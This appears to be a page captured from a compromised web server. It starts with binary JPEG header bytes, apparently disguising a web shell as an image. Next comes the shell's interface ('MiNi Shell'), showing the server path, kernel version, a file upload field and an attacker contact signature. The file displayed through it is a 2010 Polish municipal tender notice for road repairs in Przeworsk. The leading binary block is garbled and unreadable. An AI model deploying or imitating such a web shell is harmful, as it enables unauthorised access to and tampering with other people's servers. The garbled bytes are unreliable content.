JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100219/34541-N-2010.html

<p class="kh_header"><b>Przeworsk: Remonty i utrzymanie dróg miejskich w Przeworsku</b><br>
<b>Numer ogłoszenia: 34541 - 2010; data zamieszczenia: 19.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta  Przeworska , ul. Jagiellońska 10, 37-200 Przeworsk, woj. podkarpackie, tel. 016 6487600, faks 016 6487600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.przeworsk.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty i utrzymanie dróg miejskich w Przeworsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie planowanych remontów istniejących nawierzchni dróg i chodników  oraz całoroczne wykonywanie napraw związanych  z bieżącym utrzymaniem systemu dróg miejskich i wewnętrznych zarządzanych przez Urząd Miasta Przeworska. Do wykonania Zamawiający przewiduje wykonanie następujących rodzajów robót:
- roboty budowlane związane z naprawą dróg, w tym zakresie będzie wykonywane oczyszczenie i skropienie emulsją  istniejącej nawierzchni a następnie ułożenie nowej nawierzchni z asfaltobetonu, warstwa wiążąca i ścieralna. Naprawa miejscowych uszkodzeń nawierzchni asfaltowych będzie odbywać się poprzez wycięcie uszkodzonych fragmentów jezdni z nadaniem regularnych kształtów , usunięcie powstałego rumoszu , skropienie nawierzchni i krawędzi emulsją asfaltową, wypełnienie ubytków masą asfaltową , uwałowanie nawierzchni oraz pokrycie emulsją i grysem krawędzi naprawianego miejsca. Naprawa spękanych i pokruszonych nawierzchni na dużych powierzchniach będzie się odbywać poprzez mechaniczne oczyszczenie nawierzchni, pokrycie jej emulsją zwiększającą przyczepność , wyprofilowanie  nawierzchni oraz wykonanie nakładki z masy asfaltowej drobnoziarnistej o grubości 3 cm. Naprawa miejscowych uszkodzeń nawierzchni tłuczniowych zamkniętych grysem polegać będzie na mechanicznym oczyszczeniu uszkodzenia , wyrównaniu krawędzi wraz z uzupełnieniem tłucznia , zaklinowaniem klińcem i uwałowaniem oraz dwukrotne pokrycie całej naprawianej nawierzchni emulsją asfaltową z posypaniem grysem bazaltowym..
-  roboty ziemne , wykonywanie koryta w miejscu poszerzenia jezdni , wykonywanie rowków pod krawężniki, wykonywanie wykopów pod przekładkę kabli energetycznych i wymianę przykanalików krat ściekowych,  odwiezienie nadmiaru ziemi. Oczyszczanie i odmulanie rowów przydrożnych oraz ścinanie poboczy polegać będzie na ręcznym usunięciu nadmiaru błota z rowów , ścięcie mechaniczne poboczy w celu umożliwienia spływu wód opadowych , odwiezienie na wskazane miejsce nadmiaru ziemi i osadu.
-   fundamentowanie ulic, wykonywana będzie podbudowa z tłucznia kamiennego oraz betonowanie ław pod krawężniki.  
-  roboty budowlane w zakresie układania chodników, zakres obejmuje rozbiórkę nawierzchni z płyt betonowych i wykonanie nowej nawierzchni z kostki betonowej o grubościach 6 i 8 cm , wymianę krawężników drogowych i zieleńcowych oraz zabezpieczenie skarp palisadą betonową i płytami ażurowymi. Naprawa nawierzchni brukowych polegająca na wymianie uszkodzonych elementów bruku i przełożeniu nawierzchni wraz z regulacją wysokości miejscach zaniżonych.
-   roboty budowlane w zakresie kanalizacji ściekowej , w tej grupie robót wykonywana będzie regulacja krat ściekowych i pokryw studni rewizyjnych, przebudowa osadników krat ściekowych wraz z wymianą przykanalików z rur betonowych na rury PCV. Regulacja i naprawa urządzeń wodno kanalizacyjnych polegać będzie na odkuciu urządzenia, skrzynki, kraty itp. , ewentualnej wymianie na nowe, ustawienia na odpowiednim poziomie , obetonowanie oraz naprawę  nawierzchni wg  technologii wskazanej wyżej. Naprawa uszkodzeń przykanalików krat ściekowych polegać będzie na wykonaniu wykopu w miejscu uszkodzenia , wyjęciu uszkodzonego odcinka rurociągu , zamontowanie nowego odcinka rurociągu z PCV wykonanie połączeń zasypanie wraz z zagęszczeniem gruntu , wykonanie podbudowy z tłucznia i naprawie nawierzchni.
-  roboty w zakresie konserwacji dróg, grupa robót obejmuje wykonywanie drobnych napraw, renowacja i uzupełnienie oznakowania itp. roboty mające na celu utrzymanie właściwego stanu nawierzchni i infrastruktury drogowej. Regeneracja nawierzchni emulsją polegać będzie na oczyszczeniu mechanicznym nawierzchni , pokrycie nawierzchni emulsją asfaltową , zasypanie grysem bazaltowym o granulacji 2-5 mm , ponowne pokrycie emulsją , zasypanie piaskiem i uwałowanie.  Naprawa i wymiana zniszczonych znaków drogowych. Przewiduje się wymianę tarcz znaków drogowych , wymianę kompletnych znaków wraz ze słupkiem z rury stalowej ocynkowanej o średnicy 50 mm i fundamentem betonowym. Odnowienie tarcz polegać będzie na oczyszczeniu mechanicznym tarczy, pomalowanie farbami chlorokauczukowymi podkładowymi i naklejeniu symboli z folii odblaskowej typ 2 . Wymieniane tarcze znaków powinny odpowiadać przepisom Rozporządzenia Ministra Infrastruktury z 3 lipca 2003  Dz. U. Nr 220 poz 2181  w sprawie znaków drogowych , powinny być wykonane z blachy ocynkowanej , odporne na złamanie poprzez odpowiednie gięcia krawędzi. Tarcze znaku typ M. Odnowienie i malowanie oznakowań poziomych . Przewidywane jest malowanie oznakowań farbą chlorokauczukową odblaskową w kolorach białych. Wykonywanie innych czynności naprawczych wynikających ze stanów awaryjnych nawierzchni pasa drogowego, 
  Zamawiający żąda od Wykonawcy udzielenia rękojmi za wady w  wykonaniu robót  na okres nie krótszy  niż 12 miesięcy, na roboty związane z bieżącym utrzymaniem dróg i nie krócej niż 24 miesiące na pozostałe  remonty.              
Szczegółowe wykazy rodzajów robót , z podziałem na części zamówienia zostały  określone w  przedmiarach  robót które są załącznikami do siwz. Zakresy rzeczowe zostały określone jako maksymalne  dla każdej części zamówienia a wielkości  faktyczne zostaną ustalone w kosztorysie wykonawczym w  trakcie realizacji umowy.          
Zamawiający może ograniczyć zakres rzeczowy na niektórych częściach zamówienia dotyczących remontów planowanych ,  w przypadku okoliczności których nie można przewidzieć w chwili podpisywania umowy.
Zakresy robót konserwacji i utrzymania dróg  będą ustalane pomiędzy Zamawiającym i Wykonawcą  i zlecane w zależności od występujących potrzeb w okresie obowiązywania umowy.
Wszystkie roboty będą prowadzone na drogach klasy L i D, o czynnym ruchu, w związku z tym faktem wykonawca przed przystąpieniem do robót opracuje wzorcowy projekt oznakowania robót i przedłoży zamawiającemu do akceptacji. Koszt oznakowania i zabezpieczenia robót należy uwzględnić w opracowywanej ofercie cenowej.
Wykonawca w zakresie robót bieżącego utrzymania dróg będzie musiał przystąpić do wykonania prac niezwłocznie po otrzymaniu pisemnego lub telefonicznego zgłoszenia, niezależnie od ilości zleconych robót oraz prowadzić prace nieprzerwanie do czasu wykonania całego zlecenia. Roboty remontowe planowane będą wykonywane w terminach uzgodnionych w harmonogramie. Szacunkowa wartość całego zamówienia jest mniejsza od kwot ustalanych w przepisach wydanych na podstawie art 8 p. 11 ustawy Pzp. p.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju robót to jest remontu nawierzchni asfaltowych i brukowych. Wartość zamówień uzupełniających nie będzie mogła przekroczyć 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.11.10.00-8, 45.23.33.30-1, 45.23.32.22-1, 45.23.24.10-9, 45.23.31.41-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów przy zastosowaniu kryterium granicznego  spełnia, nie spełnia. Oferta spełniająca wymogi otrzyma ocenę  spełnia, natomiast oferta niespełniająca wymogów otrzyma ocenę nie spełnia i zostanie odrzucona.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w p. 3.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w p. 3.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w p. 3.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jak w p. 3.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany w umowie dotyczące: zmniejszenia zakresu rzeczowego zamówienia, wykonania robót zamiennych i w związku z tym korekty wynagrodzenia  oraz zmiany osób kierujących i nadzorujących wykonaniem zamówienia. Warunkiem dokonania zmian będzie nieprzewidywalność sytuacji powodującej zmianę w chwili podpisywania umowy np: nagłe zjawiska atmosferyczne uniemożliwiające zachowanie przyjętych technologii wykonania robót  , lub zmiana będzie korzystna dla zamawiającego. Wszelkie zmiany będą dokonywane w formie pisemnych aneksów, za zgodą obydwu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przeworsk.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Przeworska , ul. Jagiellońska 10, 37-200 Przeworsk , pok 122.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2010 godzina 10:00, miejsce: Urząd Miasta Przeworska , ul. Jagiellońska 10, 37-200 Przeworsk,pok. 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W związku z podziałem zamówienia na części zamawiający dopuszcza składanie ofert częściowych. Oznacza to , że wykonawcy mogą złożyć ofertę na wszystkie części zamówienia lub na dowolną część  zgodnie z podziałem jak wyżej.
Zamawiający dopuszcza fakturowanie częściowe nie przekraczające 70% wartości zamówienia za wykonane i odebrane  elementy robót ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie remontów bieżących i konserwacji nawierzchni drogowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie napraw bieżących i awaryjnych nawierzchni drogowych , oznakowania dróg , utrzymywania rowów przydrożnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.41-9, 45.23.31.42-6, 45.11.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie remontów i modernizacji nawierzchni asfaltowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie nawierzchni asfaltowych nakładek z masy o grubości 3 cm , frezowanie nawierzchni w miejscach odkształceń , naprawa uszkodzeń masą asfaltową , wymianę krawężników oraz wykonanie podbudowy  tłuczniowej w miejscach poszerzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.11.10.00-8, 45.23.33.30-1, 45.23.24.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 160.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie remontów i modernizacji nawierzchni brukowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wymianę nawierzchni z płyt betonowych na kostkę brukową betonową , wymianę krawężników i obrzeży betonowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.11.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie remontów i modernizacji nawierzchni drogowych Oś Benbenka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wymianę nawierzchni żużlowej na nawierzchnię asfaltową wraz z ułożeniem krawężników betonowych , regulację pokryw studni wod kan i krat ściekowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.11.10.00-8, 45.23.33.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com